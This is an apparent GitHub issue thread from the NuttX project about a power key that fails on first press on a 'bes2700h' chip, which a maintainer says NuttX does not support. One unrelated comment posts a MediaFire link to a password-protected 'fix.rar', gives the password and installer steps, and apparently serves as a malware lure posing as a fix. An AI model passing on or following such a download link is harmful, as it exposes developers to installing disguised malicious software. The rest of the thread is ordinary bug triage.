### ISSUE TITLE
[BUG] <The power key is ineffective when first pressed in bes2700h>

### ISSUE THREAD

**Issue by luke7999** [apache/nuttx#13206]
### Description / Steps to reproduce the issue

The power key is ineffective when first pressed in bes2700h

### On which OS does this issue occur?

[Linux]

### What is the version of your OS?

ubuntu 20.04.6

### NuttX Version

nuttx 6.27

### Issue Architecture

[risc-v]

### Issue Area

[Drivers]

### Verification

- [X] I have verified before submitting the report.

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by acassis** [comment]
@luke7999 what is bes2700h ? I cannot find any reference to it in NuttX source code

**Comment by luke7999** [comment]
The 2700h is chip name.

**Comment by acassis** [comment]
NuttX doesn't support any chip with his name, please search all supported microcontrollers/processors at https://github.com/apache/nuttx/tree/master/arch
